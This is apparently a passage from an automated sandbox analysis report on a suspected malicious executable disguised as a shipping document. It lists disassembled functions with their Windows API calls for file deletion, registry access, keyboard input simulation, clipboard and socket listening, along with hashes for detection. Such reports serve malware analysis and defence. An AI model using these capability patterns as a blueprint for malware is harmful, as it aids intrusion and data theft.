Instruction Fuzzy Hash: A172B471E002199BEF14CF58C8407BDB7B5FF85360F14816AE905EB285EB749D86EB90

Function 00FB96BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00FB96DC
FindNextFileW.KERNEL32(00000000,?), ref: 00FB9737
FindClose.KERNEL32(00000000), ref: 00FB9742
FindFirstFileW.KERNEL32(*.*,?), ref: 00FB975E
SetCurrentDirectoryW.KERNEL32(?), ref: 00FB97AE
SetCurrentDirectoryW.KERNEL32(01006B80), ref: 00FB97CC
FindNextFileW.KERNEL32(00000000,00000010), ref: 00FB97D6
FindClose.KERNEL32(00000000), ref: 00FB97E3
FindClose.KERNEL32(00000000), ref: 00FB97F3

Part of subcall function 00FADA03: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00FADA1E

Strings

*.*, xrefs: 00FB9759

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: b5d6717a727eb25a96b4119911769712450a82650f8180d7f9b2851f6f128c85
Instruction ID: 1117594e95bc870a68a8541248c7df1204db6332efefb47f23f2f6d2f46ca259
Opcode Fuzzy Hash: b5d6717a727eb25a96b4119911769712450a82650f8180d7f9b2851f6f128c85
Instruction Fuzzy Hash: 9131237290960A6BCB10AFB6DC08ADE37EE9F05370F204156E950A3090DFB8DE84FE50

Function 00FCBD6B Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FCC8BF: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FCB5D5,?,?), ref: 00FCC8DC
Part of subcall function 00FCC8BF: _wcslen.LIBCMT ref: 00FCC918
Part of subcall function 00FCC8BF: _wcslen.LIBCMT ref: 00FCC98F
Part of subcall function 00FCC8BF: _wcslen.LIBCMT ref: 00FCC9C5

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FCBE65
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00FCBED0
RegCloseKey.ADVAPI32(00000000), ref: 00FCBEF4
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00FCBF53
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00FCC00E
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00FCC07B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00FCC110
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00FCC161
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00FCC20A
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00FCC2A9
RegCloseKey.ADVAPI32(00000000), ref: 00FCC2B6

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: 53ade35b59dca88cac1bab83f94072d64c111a920ca99a9019dfb4eb24b26862
Instruction ID: 6f7b7445e099548e897dba30a4ddae0035e8c1f6557198b5d6d4d934d86a38f5
Opcode Fuzzy Hash: 53ade35b59dca88cac1bab83f94072d64c111a920ca99a9019dfb4eb24b26862
Instruction Fuzzy Hash: 86028D71A042019FC714DF64C996F2ABBE5EF88314F18849DF84ACB2A2CB31ED41DB91

Function 00FB80B3 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00FB8175
SystemTimeToFileTime.KERNEL32(?,?), ref: 00FB8185
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00FB8191
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FB822E
SetCurrentDirectoryW.KERNEL32(?), ref: 00FB8242
SetCurrentDirectoryW.KERNEL32(?), ref: 00FB8274
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00FB82AA
SetCurrentDirectoryW.KERNEL32(?), ref: 00FB82B3

Strings

*.*, xrefs: 00FB82B9

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: ede748a8e79b68e085dc718b730baf139033d613d99b862dd9c3fadbe304ad3e
Instruction ID: 0f169d99ac3cd3e70c51723ef5cc438aa15f54155ae945f0b6bb174cefae9ab4
Opcode Fuzzy Hash: ede748a8e79b68e085dc718b730baf139033d613d99b862dd9c3fadbe304ad3e
Instruction Fuzzy Hash: FB6189725046059FCB10EF61C840A9EB7E9FF89360F04892EF98983251EB35E906DF92

Function 00FACF94 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F4592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F45922,?,?,00F448AA,?,?,?,00000000), ref: 00F4594D

Part of subcall function 00FAE0B7: GetFileAttributesW.KERNEL32(?,00FACEB3), ref: 00FAE0B8

FindFirstFileW.KERNEL32(?,?), ref: 00FAD040
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00FAD0FB
MoveFileW.KERNEL32(?,?), ref: 00FAD10E
DeleteFileW.KERNEL32(?,?,?,?), ref: 00FAD12B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00FAD155

Part of subcall function 00FAD1BA: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00FAD13A,?,?), ref: 00FAD1D0

FindClose.KERNEL32(00000000,?,?,?), ref: 00FAD171
FindClose.KERNEL32(00000000), ref: 00FAD182

Strings

\*.*, xrefs: 00FACFEB, 00FACFF4, 00FAD009

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 28841f37e91770dec6098b9da9ac74e3c2a0836cff922f8679e9aa3a3b9fa3e3
Instruction ID: 85601cfe3e11b140c09aa69e9860017c14bd9ce840f58ac99fb088cb4736603c
Opcode Fuzzy Hash: 28841f37e91770dec6098b9da9ac74e3c2a0836cff922f8679e9aa3a3b9fa3e3
Instruction Fuzzy Hash: 76614D71C0214DAADF01EFE0CE529EDBB75AF55300F244165E80277192EB796F09EBA1

Function 00FBEC91 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00FBECB8
EmptyClipboard.USER32 ref: 00FBECBE
GlobalAlloc.KERNEL32(00000002,?), ref: 00FBECD3
CloseClipboard.USER32 ref: 00FBEDCA

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: f6ef7169856d2d98fcca9ff29ef10608bf4d91d4e99e5cc6ff29f2c0f5b8ff66
Instruction ID: b71e9bf78755684bfe7bce9921a9555f37566bd4620a0b740b1707dcf91128a1
Opcode Fuzzy Hash: f6ef7169856d2d98fcca9ff29ef10608bf4d91d4e99e5cc6ff29f2c0f5b8ff66
Instruction Fuzzy Hash: 61419D35605601AFD720DF25D888B997BE5EF48328F14C499E8298BB62C775EC42EFD0

Function 00FAE814 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00FA1607: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FA1651
Part of subcall function 00FA1607: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FA167E
Part of subcall function 00FA1607: GetLastError.KERNEL32 ref: 00FA168E

ExitWindowsEx.USER32(?,00000000), ref: 00FAE850

Strings

SeShutdownPrivilege, xrefs: 00FAE820
@, xrefs: 00FAE843
, xrefs: 00FAE83E
, xrefs: 00FAE87A

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 2caaca2d65c5241cb6d26cd62bd0c87a6aa0f2db03dfc40098805d94458ded21
Instruction ID: 584fef44420d7f489a219b637ef7bd7510adcefd0f1f3fde4fc3f8f3a73a3c84
Opcode Fuzzy Hash: 2caaca2d65c5241cb6d26cd62bd0c87a6aa0f2db03dfc40098805d94458ded21
Instruction Fuzzy Hash: 6A01D6B2A512256BFB1422B49C89BBA736CDB16391F154525FD02E21D1C5696C50A1E0

Function 00FC112B Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00FC119D
WSAGetLastError.WSOCK32 ref: 00FC11AA
bind.WSOCK32(00000000,?,00000010), ref: 00FC11E1
WSAGetLastError.WSOCK32 ref: 00FC11EC
closesocket.WSOCK32(00000000), ref: 00FC121B
listen.WSOCK32(00000000,00000005), ref: 00FC122A
WSAGetLastError.WSOCK32 ref: 00FC1234
closesocket.WSOCK32(00000000), ref: 00FC1263

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: f9217433f6227f54e6f40c351453f04d779d35945e15aa211d6c8bb54a7b37c3
Instruction ID: f93c928c4959a683c9a2dcf80e07bad10b1fad73ce9b59e7af294c7232984ee8
Opcode Fuzzy Hash: f9217433f6227f54e6f40c351453f04d779d35945e15aa211d6c8bb54a7b37c3
Instruction Fuzzy Hash: EA416D35A001069FD710DF24C985F69BBE6BB46328F18818DD8568B293C775EC81EBE1

Function 00FAD2C7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F4592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F45922,?,?,00F448AA,?,?,?,00000000), ref: 00F4594D

Part of subcall function 00FAE0B7: GetFileAttributesW.KERNEL32(?,00FACEB3), ref: 00FAE0B8

FindFirstFileW.KERNEL32(?,?), ref: 00FAD33E
DeleteFileW.KERNEL32(?,?,?,?), ref: 00FAD38E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00FAD39F
FindClose.KERNEL32(00000000), ref: 00FAD3B6
FindClose.KERNEL32(00000000), ref: 00FAD3BF

Strings

\*.*, xrefs: 00FAD310

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: e249a547d4a045b47f9d453a7b8a3b9c37792117650b7236fe392f92893cd05b
Instruction ID: ec7421ec8fa22d7327c28dec5392891e6bac8eda31fa0b3a124088801d1089d9
Opcode Fuzzy Hash: e249a547d4a045b47f9d453a7b8a3b9c37792117650b7236fe392f92893cd05b
Instruction Fuzzy Hash: B031A67100A3459FC700EF64DC518AF7BE8BE92311F444E1EF8D692191EB64DA09E7A3

Function 00F7E4A0 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00F7E5E6

Strings

1#SNAN, xrefs: 00F7F7E5
1#INF, xrefs: 00F7F7F3
1#QNAN, xrefs: 00F7F7EC
1#IND, xrefs: 00F7F7DE

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 292011b35c0ce1853df58822be54a91b43b05f85d4b68a1d0aed955b1a3ccada
Instruction ID: 082ab4d034fb83fe8e523a5375dd493d43aef60f9adfc7201db56413e3b890f0
Opcode Fuzzy Hash: 292011b35c0ce1853df58822be54a91b43b05f85d4b68a1d0aed955b1a3ccada
Instruction Fuzzy Hash: 12C24C72E046288FDB25CE28DD407EAB7B5EB48314F1581EBD44DE7240E778AE859F42

Function 00FB63AC Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FB63FA
CoInitialize.OLE32(00000000), ref: 00FB6557
CoCreateInstance.OLE32(00FDFD14,00000000,00000001,00FDFB84,?), ref: 00FB656E
CoUninitialize.OLE32 ref: 00FB67F2

Strings

.lnk, xrefs: 00FB63D8, 00FB6442, 00FB64FE

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 0fd270dc03d81391f1e444096b9eb162b6f661ead81d133e6c9af7f97eefd2de
Instruction ID: 21a382558f87ec2a1cc03c6469d1e268933e4c31a544643513c90f43a0afaf25
Opcode Fuzzy Hash: 0fd270dc03d81391f1e444096b9eb162b6f661ead81d133e6c9af7f97eefd2de
Instruction Fuzzy Hash: 6BD15971608741AFC310EF25C881DABBBE8FF84704F04496DF5958B2A2DB75E906DB92

Function 00FB9A49 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00F4B606: _wcslen.LIBCMT ref: 00F4B610

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00FB9A96
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00FB9BA9

Part of subcall function 00FB3792: GetInputState.USER32 ref: 00FB37E9
Part of subcall function 00FB3792: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FB3884

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00FB9AC6
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00FB9B93

Strings

*.*, xrefs: 00FB9A7B

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 3f50671ec0f9ed467d5b28083563e263ccfc8726bd4655ceeaa62045f890c461
Instruction ID: 86b69f9c725a9683668079c96bf421e0cff06cd1303aa71e08e448be642db837
Opcode Fuzzy Hash: 3f50671ec0f9ed467d5b28083563e263ccfc8726bd4655ceeaa62045f890c461
Instruction Fuzzy Hash: 8E41927190520AAFCF10EFA5DC49AEEBBB4EF45320F248056E904A3192EB759F44EF50

Function 00FAA975 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00FAA9CA
SetKeyboardState.USER32(00000080), ref: 00FAA9E6
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00FAAA54
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00FAAAA6

Strings

______________________________________________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwx, xrefs: 00FAAA08

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID: ______________________________________________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwx
API String ID: 432972143-2147846139
Opcode ID: 984bcd97d92911ccbb40bb657ee96f9b3f85d961c8920cfa7e78978cb522a5ed
Instruction ID: 990eea6f400245b8169a5273ba303b5554f943b7a2ab62ae81c7e8fccbe2ddbf
Opcode Fuzzy Hash: 984bcd97d92911ccbb40bb657ee96f9b3f85d961c8920cfa7e78978cb522a5ed
Instruction Fuzzy Hash: E43105B0E40248EEEF318B6489057FE7BE9AB46320F04421AE485921D1D37DC989F7A6

Function 00F499D0 Relevance: 8.7, Strings: 6, Instructions: 1152COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00F869C6
ERCP, xrefs: 00F49AAC
VUUU, xrefs: 00F49DA8
VUUU, xrefs: 00F49D54
_______________________________________________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvw, xrefs: 00F868E5
VUUU, xrefs: 00F49D66

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU$_______________________________________________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvw
API String ID: 0-989728338
Opcode ID: 15f9271d7158baff8f89c100642e17370165a79efda8674b5a74ebde20f606d5
Instruction ID: dff84ba70c85c7927d5d306dde75bac7ea83feb3ebb75b29940f2cefecfca21d
Opcode Fuzzy Hash: 15f9271d7158baff8f89c100642e17370165a79efda8674b5a74ebde20f606d5
Instruction Fuzzy Hash: 88A27D71E0421ACBDF24DF58C9407EEBBB1AF54324F2481A9EC15EB284E7749D81EB91

Function 00F5ADFD Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00F5B021: GetWindowLongW.USER32(?,000000EB), ref: 00F5B032

DefDlgProcW.USER32(?,?,?,?,?), ref: 00F5AECE
GetSysColor.USER32(0000000F), ref: 00F5AFA3
SetBkColor.GDI32(?,00000000), ref: 00F5AFB6

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: f4887b23e8221a50ebec17d0747f18eb0ab5f6b9881cdc3294df82452541485a
Instruction ID: 1565277aaf09e2b11bb41c0e6d45ac6e9da5214f915b7db71102d2fb19b4a000
Opcode Fuzzy Hash: f4887b23e8221a50ebec17d0747f18eb0ab5f6b9881cdc3294df82452541485a
Instruction Fuzzy Hash: 92A16EB1505104BFEA389A398C49F7B369EDB473A1F140309FB12C6295CA299D5AF373

Function 00FC172D Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC2F75: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00FC2FA1
Part of subcall function 00FC2F75: _wcslen.LIBCMT ref: 00FC2FC2

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00FC1784
WSAGetLastError.WSOCK32 ref: 00FC17AB
bind.WSOCK32(00000000,?,00000010), ref: 00FC1802
WSAGetLastError.WSOCK32 ref: 00FC180D
closesocket.WSOCK32(00000000), ref: 00FC183C

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: b70b127d178c6f3218436f54b3a56aff924ab930b506007e1ef9a20cd58b8e65
Instruction ID: 0764d7f0fdb5e78c825b22f0d1e096e3a7ef9dfa25ecc6c1d3bd97b216d88e9e
